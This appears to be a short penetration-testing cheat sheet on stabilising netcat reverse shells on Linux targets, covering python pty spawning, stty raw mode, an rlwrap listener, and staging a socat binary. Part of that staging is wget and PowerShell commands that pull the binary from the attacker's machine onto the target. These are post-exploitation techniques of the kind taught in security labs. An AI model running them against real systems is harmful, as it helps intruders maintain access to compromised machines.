Netcat Shell Stabilization
Last updated
Last updated
Netcat shells are non-interactive and often have strange formatting errors
Only applicable only to Linux boxes
Three stage process:
Use python -c 'import pty;pty.spawn("/bin/bash")', which uses Python to spawn a better bash shell
Then use export TERM=xterm -- this will give us access to term commands such as clear
Background the shell using Ctrl + Z, back in our own terminal we use stty raw -echo; fg. This does two things:
Turns off our own terminal echo (gives us access to tab autocompletes, arrow keys, and Ctrl + C to kill processes)
Foregrounds the shell, completing the process
rlwrap is a program which gives us access to history, tab autocompletion and the arrow keys immediately upon receiving a shell
Not installed by default on Kali so install it with sudo apt install rlwrap
To use rlwrap , invoke a slightly different listener: rlwrap nc -lvnp <port>
Prepending the netcat listener with rlwrap gives us a much more fully featured shell
When dealing with a Linux target
Use the same trick as in step three of the previous technique
background the shell with Ctrl + Z, then use stty raw -echo; fg to stabilize and re-enter the shell
This technique is limited to Linux targets
First transfer a socat static compiled binary (a version of the program compiled to have no dependencies) up to the target machine
You can use a webserver on the attacking machine inside the directory containing your socat binary (sudo python3 -m http.server 80)
Then on the target machine, use the netcat shell to download the file with curl or wget (wget <LOCAL-IP>/socat -O /tmp/socat)
In a Windows environment the same can be done with Powershell, using the Invoke-WebRequest or a webrequest system class (Invoke-WebRequest -uri <LOCAL-IP>/socat.exe -outfile C:\\Windows\temp\socat.exe)
With all of the above techniques change your terminal tty size using stty -a
